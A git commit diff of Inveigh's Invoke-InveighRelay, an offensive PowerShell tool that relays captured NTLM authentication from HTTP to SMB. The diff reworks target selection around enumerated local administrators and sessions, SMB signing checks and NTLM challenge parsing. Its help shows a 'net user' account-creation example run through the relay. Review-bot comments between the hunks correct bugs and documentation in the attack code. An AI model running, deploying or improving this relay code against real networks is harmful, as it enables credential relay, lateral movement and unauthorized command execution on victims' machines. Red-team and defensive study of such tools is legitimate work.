authorKevin Robertson <robertsonk@gmail.com>2018-07-10 09:54:52 -0400
committerKevin Robertson <robertsonk@gmail.com>2018-07-10 09:54:52 -0400
commite424cb858cfa765c057384b7daba9360624b82a0 (patch)
treef4c2aa6cdb603ff07a0b4455009295a927268b7b
parent3f070816e7b54b83aac16b8e7985017199e5cc08 (diff)
downloadInveigh-e424cb858cfa765c057384b7daba9360624b82a0.tar.gz
Inveigh-e424cb858cfa765c057384b7daba9360624b82a0.zip
Inveigh 1.4 dev update
Invoke-Inveigh - Added ADIDNS spoofing combo and wildcard attacks. Removed dynamic updates combo attack. Invoke-InveighRelay - Latest revision of the new multi-host targeting system. I haven't yet had a chance to create a tool for importing CSV files from bloodhound. I was able to match up the data formatting though.
-rw-r--r--Inveigh-Relay.ps11375
-rw-r--r--Inveigh.ps11875
-rw-r--r--Invoke-DNSUpdate.ps11437
3 files changed, 2328 insertions, 2359 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1
index 6486301..9b61ff7 100644
--- a/Inveigh-Relay.ps1
+++ b/Inveigh-Relay.ps1
@@ -2,20 +2,13 @@ function Invoke-InveighRelay
{
<#
.SYNOPSIS
-This function performs NTLMv2 HTTP to SMB relay with psexec style command execution.
+This function performs NTLMv1/NTLMv2 HTTP to SMB relay.
.DESCRIPTION
-Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB2.1 relay with psexec style command execution.
-
- HTTP/HTTPS to SMB NTLMv2 relay with granular control
- Supports SMB2.1 targets
- Does not require priveleged access on the Invoke-InveighRelay host
- The Invoke-InveighRelay host can be targeted for privilege escalation
- NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
- Granular control of console and file output
+This function performs NTLMv1/NTLMv2 HTTP to SMB relay.
.PARAMETER Attack
-Default = not sure yet: (Enumerate/Execute/Session) Comma seperated list of attacke to perform with relay. Enumerate
+Default = not sure yet: (Enumerate/Execute/Session) Comma seperated list of attacks to perform with relay. Enumerate
leverages relay to perform enumeration on target systems. The collected data is used for target selection.
Execute performs PSExec style command execution. Session creates and maintains authenticated SMB sessions that
can be interacted with through Invoke-TheHash's Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec.
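Review bot: The new .DESCRIPTION on L38 is a verbatim copy of the .SYNOPSIS on L28, so the help now says the same sentence twice, and the removed feature list (HTTP/HTTPS, SMB2.1 targets, console/file output control) was the only place a reader learned what the relay can do; an abbreviated version is worth restoring. The corrected line on L41 still spells "seperated" and still reads "Default = not sure yet" even though the param block on L96 defaults $Attack to ("Enumerate","Session"); suggest `Default = Enumerate,Session: (Enumerate/Execute/Session) Comma separated list of attacks to perform with relay.`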
@@ -43,6 +36,19 @@ displaying full capture lists when running through a shell that does not have ac
Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
and username combinations when real time console output is enabled.
+.PARAMETER Enumerate
+
+.PARAMETER EnumerateGroup
+
+.PARAMETER EnumerateRepeat
+
+.PARAMETER Execute
+Command to execute on relay target. Use PowerShell character escapes where necessary.
+
+.PARAMETER ExecuteRepeat
+
+.PARAMETER FailedAuthLimit
+
.PARAMETER FileOutput
Default = Disabled: (Y/N) Enable/Disable real time file output.
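Review bot: The .PARAMETER names added here do not all match the param block: EnumerateRepeat (L52) and ExecuteRepeat (L57) have no corresponding parameter, while the param block declares $RepeatEnumerate and $RepeatExecute (L120-121), so Get-Help shows nothing for either and one side should be renamed. The entries for Enumerate, EnumerateGroup, EnumerateRepeat, ExecuteRepeat and FailedAuthLimit are empty, as are the SessionLimit*/SessionRefresh and TargetRefresh entries in the hunks at L66-73 and L82-83; the defaults are all visible in the param block, so each entry could at least state them, e.g. `Default = All: (All/NetSession/Share/User/Group) Enumeration types to perform through relay.` for Enumerate and `Default = 2` for FailedAuthLimit, with the meaning filled in by the author since it is not visible here.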
@@ -126,6 +132,14 @@ Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is dis
.PARAMETER Service
Default = 20 Character Random: Name of the service to create and delete on the target.
+.PARAMETER SessionLimitPriv
+
+.PARAMETER SessionLimitShare
+
+.PARAMETER SessionLimitUnpriv
+
+.PARAMETER SessionRefresh
+
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
@@ -145,6 +159,11 @@ selection and filter out invalid targets. Something like a /16 with only a few h
Comma separated list of IP addresses to exlude from the target list. This parameter will accept single addresses,
CIDR, or ranges on the format of 192.168.0.1-192.168.0.10.
+.PARAMETER TargetRandom
+Default = Enabled: (Y/N) Enable/Disable selecting a random target is a target is not found through logic.
+
+.PARAMETER TargetRefresh
+
.PARAMETER Tool
Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
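Review bot: .PARAMETER TargetRandom (L79-80) documents a parameter that does not exist; the param block declares `[ValidateSet("Random","Strict")][String]$TargetMode = "Random"` (L98) and the selection code keys off `$TargetMode -eq 'Random'` (L834). Rename the entry to TargetMode and fix the sentence ("is a target is not found"), e.g. `Default = Random: (Random/Strict) Random falls back to a random host from the target list when no target is found through enumeration data.` What Strict does is inferred only from the absence of that fallback branch, so confirm before documenting it.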
@@ -171,11 +190,16 @@ Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /
https://github.com/Kevin-Robertson/Inveigh
#>
+#region begin parameters
+
# Parameter default values can be modified in this section:
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][ValidateSet("Enumerate","Session","Execute")][Array]$Attack = ("Enumerate","Session"),
+ [parameter(Mandatory=$false)][ValidateSet("All","NetSession","Share","User","Group")][String]$Enumerate = "All",
+ [parameter(Mandatory=$false)][ValidateSet("Random","Strict")][String]$TargetMode = "Random",
+ [parameter(Mandatory=$false)][String]$EnumerateGroup = "Administrators",
[parameter(Mandatory=$true)][Array]$Target = "",
[parameter(Mandatory=$false)][Array]$TargetExclude = "",
[parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
@@ -184,16 +208,19 @@ param
[parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
[parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$FailedAuthLimit = "2",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
[parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
[parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$false)][Int]$SessionLimitPriv = "2",
[parameter(Mandatory=$false)][Int]$SessionLimitShare = "10",
[parameter(Mandatory=$false)][Int]$SessionLimitUnpriv = "0",
- [parameter(Mandatory=$false)][Int]$SessionLimitPriv = "2",
[parameter(Mandatory=$false)][Int]$SessionRefresh = "10",
- [parameter(Mandatory=$false)][Object]$Source,
+ [parameter(Mandatory=$false)][Int]$TargetRefresh = "60",
+ [parameter(Mandatory=$false)][Int]$RepeatEnumerate = "10",
+ [parameter(Mandatory=$false)][Int]$RepeatExecute = "10",
[parameter(Mandatory=$false)][String]$Command = "",
[parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
[parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
@@ -211,7 +238,6 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SessionPriority = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SigningCheck = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
@@ -225,6 +251,9 @@ param
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
+#endregion
+#region begin initialization
+
if ($invalid_parameter)
{
Write-Output "[-] $($invalid_parameter) is not a valid parameter."
@@ -234,8 +263,18 @@ if ($invalid_parameter)
$inveigh_version = "1.4 Dev"
if($ProxyIP -eq '0.0.0.0')
-{
+{
+
+ try
+ {
$proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+ }
+ catch
+ {
+ Write-Output "[-] Error finding proxy IP, specify manually with -ProxyIP"
+ throw
+ }
+
}
if($Attack -contains 'Execute' -and !$Command)
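Review bot: The new try/catch around Test-Connection (L148-156) only catches terminating errors; a failed ping from Test-Connection is typically surfaced as a non-terminating error, in which case $proxy_WPAD_IP is silently $null and the catch never runs. Adding `-ErrorAction Stop` to the call, `$proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 -ErrorAction Stop | Select-Object -ExpandProperty Ipv4Address)`, makes the catch reliable. Writing the diagnostic with Write-Output on L154 matches the existing style on L141, so that is consistent.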
@@ -269,16 +308,17 @@ if(!$inveigh)
$inveigh.requested_host_list = New-Object System.Collections.ArrayList
$inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
$inveigh.DNS_list = New-Object System.Collections.ArrayList
- $inveigh.relay_privilege_table = [HashTable]::Synchronized(@{})
$inveigh.relay_failed_auth_table = [HashTable]::Synchronized(@{})
$inveigh.relay_history_table = [HashTable]::Synchronized(@{})
$inveigh.session_socket_table = [HashTable]::Synchronized(@{})
$inveigh.session_table = [HashTable]::Synchronized(@{})
$inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
$inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.domain_mapping_table = [HashTable]::Synchronized(@{})
+ $inveigh.group_table = [HashTable]::Synchronized(@{})
$inveigh.session_count = 0
$inveigh.session_list = @()
- $inveigh.enumeration_list = @()
+ $inveigh.enumeration_data = @()
}
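Review bot: $inveigh.enumeration_data (L176) is a plain array inside the synchronized hashtable, unlike the tables above it, and later hunks grow it with `+=` from the relay script block (L300, L366) and mutate entries by an Index captured from Where-Object. `+=` replaces the array each time, so if more than one runspace appends concurrently an entry can be lost and a captured Index can point at a stale element. If several runspaces touch it, a `New-Object System.Collections.ArrayList` (as used on L161-163) with `.Add()` plus the lock style of session_lock_table would be safer; if only one runspace ever writes it, a comment saying so would remove the concern.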
if($inveigh.relay_running)
@@ -287,6 +327,8 @@ if($inveigh.relay_running)
throw
}
+$inveigh.stop = $false
+
if(!$inveigh.running)
{
$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
@@ -404,7 +446,8 @@ if($inveigh.running)
$inveigh.output_pause = $true
}
-# Write startup messages
+#endregion
+#region begin startup messages
$inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null
if($firewall_status)
@@ -596,6 +639,8 @@ if($Proxy -eq 'Y')
}
+$inveigh.output_queue.Add("[+] Relay Attack = " + ($Attack -join ",")) > $null
+
if($Target.Count -eq 1)
{
$inveigh.output_queue.Add("[+] Relay Target = " + ($Target -join ",")) > $null
@@ -971,12 +1016,33 @@ while($inveigh.output_queue.Count -gt 0)
}
+$inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value
+$inveigh.computer_name = (Get-ChildItem -path env:computername).Value
+
+try
+{
+ $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain).Value).ToLower()
+ $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower()
+
+ if(!$inveigh.domain_mapping_table.ContainsKey($inveigh.netBIOS_domain))
+ {
+ $inveigh.domain_mapping_table.Add($inveigh.netBIOS_domain,$inveigh.DNS_domain)
+ }
+
+}
+catch
+{
+ $inveigh.DNS_domain = $inveigh.netBIOS_domain
+ $inveigh.DNS_computer_name = $inveigh.computer_name
+}
+
if($inveigh.running)
{
$inveigh.output_pause = $false
}
-# Begin ScriptBlocks
+#endregion
+#region begin script blocks
# Shared Basic Functions ScriptBlock
$shared_basic_functions_scriptblock =
@@ -1993,27 +2059,112 @@ $SMB_relay_functions_scriptblock =
$NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
}
+ $target_name_length = Get-UInt16DataLength (($NTLM_index + 24) / 2) $payload_bytes
+ $negotiate_flags = [System.Convert]::ToInt16(($payload.SubString(($NTLM_index + 44),2)),16)
+ $negotiate_flags = [Convert]::ToString($negotiate_flags,2)
+ $target_info_flag = $negotiate_flags.SubString(0,1)
+
+ if($target_info_flag -eq 1)
+ {
+ $target_info_index = ($NTLM_index + 80) / 2
+ $target_info_index = $target_info_index + $target_name_length + 16
+ $target_info_item_type = $payload_bytes[$target_info_index]
+ $i = 0
+
+ while($target_info_item_type -ne 0 -and $i -lt 10)
+ {
+ $target_info_item_length = Get-UInt16DataLength ($target_info_index + 2) $payload_bytes
+
+ switch($target_info_item_type)
+ {
+
+ 2
+ {
+ $netBIOS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $payload_bytes
+ }
+
+ 3
+ {
+ $DNS_computer_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $payload_bytes
+ }
+
+ 4
+ {
+ $DNS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $payload_bytes
+ }
+
+ }
+
+ $target_info_index = $target_info_index + $target_info_item_length + 4
+ $target_info_item_type = $payload_bytes[$target_info_index]
+ $i++
+ }
+
+ if($netBIOS_domain_name -and $DNS_domain_name -and !$inveigh.domain_mapping_table.ContainsKey($netBIOS_domain_name) -and $netBIOS_domain_name -ne $DNS_domain_name)
+ {
+ $inveigh.domain_mapping_table.Add($netBIOS_domain_name,$DNS_domain_name)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Domain mapping added for $netBIOS_domain_name to $DNS_domain_name") > $null
+ }
+
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+
+ if($inveigh.enumeration_data | Where-Object {$_.IP -eq $target -and !$_.Hostname})
+ {
+ $inveigh.enumeration_data[$target_index].Hostname = $DNS_computer_name
+ }
+ elseif($inveigh.enumeration_data[$target_index].Hostname -ne $DNS_computer_name)
+ {
+
+ if($inveigh.enumeration_data | Where-Object {$_.Hostname -eq $DNS_computer_name})
+ {
+ $target_hostname_index = $inveigh.enumeration_data | Where-Object {$_.Hostname -eq $DNS_computer_name} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_hostname_index].IP = $target
+ $inveigh.enumeration_data[$target_index].IP = $null
+ }
+ else
+ {
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $target -Hostname $DNS_computer_name -SMBServer $true -Targeted $(Get-Date -format s)
+ }
+
+ }
+
+ }
+
return $NTLM_challenge
}
function New-RelayEnumObject
{
- param ($IP,$Targeted,$Sessions,$AdministratorUsers,$AdministratorGroups,$Shares,$NetSessions,$LocalUsers,$SMB2,$Signing,$SMBServer,$LastActivity)
+ param ($IP,$Hostname,$Sessions,$AdministratorUsers,$AdministratorGroups,$Privileged,$Shares,$NetSessions,$NetSessionsMapped,
+ $LocalUsers,$SMB2,$Signing,$SMBServer,$Targeted,$Enumerate,$Execute)
+
+ if($Sessions -and $Sessions -isnot [Array]){$Sessions = @($Sessions)}
+ if($AdministratorUsers -and $AdministratorUsers -isnot [Array]){$AdministratorUsers = @($AdministratorUsers)}
+ if($AdministratorGroups -and $AdministratorGroups -isnot [Array]){$AdministratorGroups = @($AdministratorGroups)}
+ if($Privileged -and $Privileged -isnot [Array]){$Privileged = @($Privileged)}
+ if($Shares -and $Shares -isnot [Array]){$Shares = @($Shares)}
+ if($NetSessions -and $NetSessions -isnot [Array]){$NetSessions = @($NetSessions)}
+ if($NetSessionsMapped -and $NetSessionsMapped -isnot [Array]){$NetSessionsMapped = @($NetSessionsMapped)}
+ if($LocalUsers -and $LocalUsers -isnot [Array]){$LocalUsers = @($LocalUsers)}
$relay_object = New-Object PSObject
- Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumeration_list.Count
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumeration_data.Count
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IP" $IP
- Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Hostname" $Hostname
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Sessions" $Sessions
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Users" $AdministratorUsers
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Groups" $AdministratorGroups
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Privileged" $Privileged
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Shares" $Shares
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions" $NetSessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions Mapped" $NetSessionsMapped
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Local Users" $LocalUsers
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB2.1" $SMB2
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Signing" $Signing
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB Server" $SMBServer
- Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Last Activity" $LastActivity
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Enumerate" $Enumeration
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Execute" $Execution
return $relay_object
}
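Review bot: New-RelayEnumObject assigns `$Enumeration` and `$Execution` on L342-343, but the parameters declared on L312-313 are `$Enumerate` and `$Execute`, so the "Enumerate" and "Execute" properties are always $null; the two lines should end `-Name "Enumerate" $Enumerate` and `-Name "Execute" $Execute`. The target-info test on L237-241 converts the byte at hex offset 44 to an unpadded binary string and reads its first character, which is "1" for any non-zero byte, not only when the 0x80 bit (the TARGET_INFO flag, if $NTLM_index is the hex offset of the NTLMSSP signature) is set; `$target_info_flag = ($negotiate_flags -band 0x80) -ne 0` on the integer before the ToString(...,2) conversion is the direct test. The enclosing challenge-parsing function starts above this hunk.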
@@ -2031,8 +2182,27 @@ $SMB_relay_functions_scriptblock =
$SMB_port_test_success = $SMB_target_test_result.AsyncWaitHandle.WaitOne(100,$false)
$SMB_target_test.Close()
- return $SMB_port_test_success
+ if($SMB_port_test_success)
+ {
+ $SMB_server = $true
+ }
+ else
+ {
+ $SMB_server = $false
+ }
+ if($inveigh.enumeration_data | Where-Object {$_.IP -eq $target})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index]."SMB Server" = $SMB_server
+ $inveigh.enumeration_data[$target_index]."Targeted" = $(Get-Date -format s)
+ }
+ else
+ {
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $target -SMBServer $SMB_server -Targeted $(Get-Date -format s)
+ }
+
+ return $SMB_port_test_success
}
function Invoke-SMBNegotiate
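Review bot: The if/else on L350-357 is a five-line way to write `$SMB_server = [Bool]$SMB_port_test_success`. L358 and L360 run the same `Where-Object {$_.IP -eq $target}` scan twice; capturing it once, `$target_entry = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target}`, then branching on it and using `$target_entry.Index` avoids the second pass and makes the assumption explicit that at most one entry carries an IP — the challenge parser at L295-296 reassigns IPs between entries, and if two entries ever match, `$target_index` becomes an array and the property assignments on L361-362 would likely fail. Test-SMBPort's header is above this hunk.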
@@ -2095,11 +2265,6 @@ $SMB_relay_functions_scriptblock =
$SMB_client.Close()
$stage = 'Exit'
}
- elseif($signing_check) # check
- {
- $SMB_client.Close()
- $stage = 'Exit'
- }
else
{
$signing = $false
@@ -2133,226 +2298,352 @@ $SMB_relay_functions_scriptblock =
return $SMB_client,$SMB2,$signing
}
- if($inveigh.target_list -gt 1)
+ function Test-SMBTarget
{
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Selecting a target") > $null
- }
+ param($targets,$limit)
- try
- {
- $target = $null
- $initiator_sessions = $inveigh.enumeration_list | Where-Object {$_.IP -eq $SourceIP -and $_.Sessions} | Select-Object -expand Sessions
$filter_date = Get-Date
- $targets_excluded = $inveigh.enumeration_list | Where-Object {$_.IP -eq $SourceIP -or ($_.Targeted -and !$_."SMB2.1" -or $_.Signing) -or ($_.Targeted -and !$_."SMB Server" -and (New-TimeSpan $_."Last Activity" $filter_date).Minutes -lt 10)} | Select-Object -expand IP
-
+ $targets_excluded = $inveigh.enumeration_data | Where-Object {$_.IP -eq $SourceIP -or ($_.Targeted -and $_."SMB Server" -and (!$_."SMB2.1" -or $_.Signing)) -or
+ ($_.Targeted -and !$_."SMB Server" -and (New-TimeSpan $_.Targeted $filter_date).Minutes -lt $TargetRefresh)} | Select-Object -expand IP
+
if($targets_excluded)
{
- $targets_filtered = Compare-Object -ReferenceObject $targets_excluded -DifferenceObject $inveigh.target_list -PassThru # check
- }
- else
- {
- $targets_filtered = $inveigh.target_list
- }
+ $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $targets_excluded -PassThru | Where-Object {$_.SideIndicator -eq "<="}
- if($initiator_sessions)
- {
- ForEach($session in $initiator_sessions)
+ if($targets -and $inveigh.relay_history_table.$SourceIP -and
+ (Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP | Where-Object {$_.SideIndicator -eq "<="}))
{
- $targets = $inveigh.enumeration_list | Where-Object {$_."Administrator Users" -contains $session} | Select-Object -expand IP
-
- if($targets)
+ [Array]$targets = Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+ elseif($targets -and ($inveigh.session_list | Where-Object {$_.Status}))
+ {
+ $targets_temp = $targets
+ $targets = @()
+
+ ForEach($target_entry in $targets_temp)
{
- $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $targets_filtered -IncludeEqual -ExcludeDifferent -PassThru
+ $sessions = @($inveigh.session_list | Where-Object {$_.Target -eq $target_entry -and $_.Status -eq 'connected'})
- if($targets -and (Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP | Where-Object {$_.SideIndicator -eq "<="}))
+ if($sessions -and $sessions.Count -lt $limit)
{
- $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP -PassThru | Where-Object {$_.SideIndicator -eq "<="}
- }
- else
- {
- $targets_temp = $targets
- $targets = @()
-
- ForEach($target_entry in $targets_temp)
- {
- [Array]$sessions = $inveigh.session_list | Where-Object {$_.Target -eq $target_entry -and $_.Status -eq 'connected'}
-
- if($sessions.Count -lt $SessionLimitPriv)
- {
- $targets += $target_entry
- }
-
- }
-
+ $targets += $target_entry
}
}
-
+
if(!$targets)
{
- $targets = $inveigh.enumeration_list | Where-Object {$_."Shares".Count -gt 0} | Select-Object -expand IP
- if($targets)
+ ForEach($target_entry in $targets_temp)
{
- $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $targets_filtered -IncludeEqual -ExcludeDifferent -PassThru
+ $sessions = @($inveigh.session_list | Where-Object {$_.Target -eq $target_entry -and $_.Status -eq 'disconnected'})
- if($targets -and (Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP | Where-Object {$_.SideIndicator -eq "<="}))
+ if($sessions)
{
- $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP -PassThru | Where-Object {$_.SideIndicator -eq "<="}
- }
- else
- {
- $targets = $null
+ $targets += $target_entry
}
}
+
+ }
+ }
+
+ }
+
+ $i = 0
+ $random_index_history = @()
+
+ while(!$target -and $i -lt $targets.Count)
+ {
+ $i++
+
+ if($targets.Count -eq 1)
+ {
+ $target = $targets[0]
+ }
+ else
+ {
+ $random_range = 0..($targets.Count - 1)
+ $random_range_filtered = $random_range | Where-Object {$random_index_history -notcontains $_}
+
+ if($random_range_filtered)
+ {
+ $random_index = Get-Random -InputObject $random_range_filtered
+ $random_index_history += $random_index
+ $target = $targets[$random_index]
}
-
- if($targets)
+
+ }
+
+ if(!($target -as [IPAddress]) -as [Bool])
+ {
+
+ try
{
- $targets_temp = $targets
+ $target = [System.Net.Dns]::GetHostEntry($target).AddressList[0].IPAddressToString
- ForEach($target_entry in $targets_temp)
+ if($target.IsIPv6LinkLocal)
{
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] IPv6 target $target not supported") > $null
+ $target = $null
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS lookup for $target failed") > $null
+ $target = $null
+ }
+
+ }
- if($inveigh.target_list -notcontains $target_entry)
- {
- $targets.remove($target_entry)
- }
+ if($target -eq $SourceIP)
+ {
+ $target = $null
+ }
- }
+ if($target)
+ {
+ $SMB_port_test_success = Test-SMBPort $target
- if($targets)
+ if($SMB_port_test_success)
+ {
+ $SMB_negotiate = Invoke-SMBNegotiate $target
+ $SMB_client = $SMB_negotiate[0]
+ $SMB2 = $SMB_negotiate[1]
+ $signing = $SMB_negotiate[2]
+ $SMB_server = $true
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index]."SMB2.1" = $SMB2
+ $inveigh.enumeration_data[$target_index].Signing = $signing
+ $inveigh.enumeration_data[$target_index]."SMB Server" = $SMB_server
+ $inveigh.enumeration_data[$target_index]."Targeted" = $(Get-Date -format s)
+
+ if(!$SMB2 -and $signing)
{
- $i = 0
- $random_index_history = @()
+ $target = $null
+ }
- while(!$target -and $i -lt $targets.Count)
- {
- $i++
+ }
+ else
+ {
+ $target = $null
+ }
- if($targets.Count -eq 1)
- {
- $target = $targets[0]
- }
- else
- {
- $random_range = 0..($targets.Count - 1)
- $random_range_filtered = $random_range | Where-Object {$random_index_history -notcontains $_}
+ }
+
+ }
- if($random_range_filtered)
- {
- $random_index = Get-Random -InputObject $random_range_filtered
- $random_index_history += $random_index
- $target = $targets[$random_index]
- }
+ return $SMB_client,$target
+ }
- }
+ if($inveigh.target_list -gt 1)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Selecting a target") > $null
+ }
- $SMB_port_test_success = Test-SMBPort $target
+ if(!($inveigh.enumeration_data | Where-Object {$_.IP -eq $SourceIP}))
+ {
+
+ try
+ {
+ $source_hostname = [System.Net.Dns]::GetHostEntry($SourceIP).HostName
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS reverse lookup for $SourceIP failed") > $null
+ }
- if($SMB_port_test_success)
- {
- $SMB_negotiate = Invoke-SMBNegotiate $target
- $SMB_client = $SMB_negotiate[0]
- $SMB2 = $SMB_negotiate[1]
- $signing = $SMB_negotiate[2]
- $SMB_server = $true
- }
- else
- {
- $SMB2 = $null
- $signing = $null
- $SMB_server = $false
- $target = $null
- }
+ }
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index].Targeted = $true
- $inveigh.enumeration_list[$target_index]."SMB2.1" = $SMB2
- $inveigh.enumeration_list[$target_index].Signing = $signing
- $inveigh.enumeration_list[$target_index]."SMB Server" = $SMB_server
- $inveigh.enumeration_list[$target_index]."Last Activity" = $(Get-Date -format s)
- }
+ try
+ {
+ $targets = $null
+ $target = $null
+ $initiator_sessions = $inveigh.enumeration_data | Where-Object {($_.IP -eq $SourceIP -or $_.Hostname -eq $source_hostname) -and $_.Sessions} | Select-Object -expand Sessions
+
+ # check if sessions match any local admin group members
+ if($initiator_sessions)
+ {
+
+ ForEach($session in $initiator_sessions)
+ {
+ $target_hostnames = $inveigh.enumeration_data | Where-Object {$_."Administrator Users" -contains $session -and !$_.IP} | Select-Object -expand Hostname
+
+ if($target_hostnames)
+ {
+ $SMB_target_results = Test-SMBTarget $target_hostnames $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+ else
+ {
+ $targets = $inveigh.enumeration_data | Where-Object {$_."Administrator Users" -contains $session -and $_.IP} | Select-Object -expand IP
+ if($targets)
+ {
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
}
-
+
}
}
}
- $i = 0
- $random_index_history = @()
-
- while(!$target -and $i -lt $targets_filtered.Count)
+ # check if sessions belong to groups that match any local admin group members
+ if($initiator_sessions -and !$targets -and $target)
{
- $i++
- $random_range = 0..($targets_filtered.Count - 1)
- $random_range_filtered = $random_range | Where-Object {$random_index_history -notcontains $_}
- if($random_range_filtered)
+ function Get-SessionGroup
{
- $random_index = Get-Random -InputObject $random_range_filtered
- $random_index_history += $random_index
- $target = $targets_filtered[$random_index]
- $SMB_port_test_success = $false
- }
+ param($session)
- if($target -and $target -ne $SourceIP -and $inveigh.relay_history_table.$SourceIP -notcontains $target)
- {
- $SMB_port_test_success = Test-SMBPort $target
+ $group_list = @()
- if($SMB_port_test_success)
+ ForEach($group in $inveigh.group_table.keys)
{
- $SMB_server = $true
- $SMB_negotiate = Invoke-SMBNegotiate $target
- $SMB_client = $SMB_negotiate[0]
- $SMB2 = $SMB_negotiate[1]
- $signing = $SMB_negotiate[2]
+
+ if($inveigh.group_table.$group -contains $session)
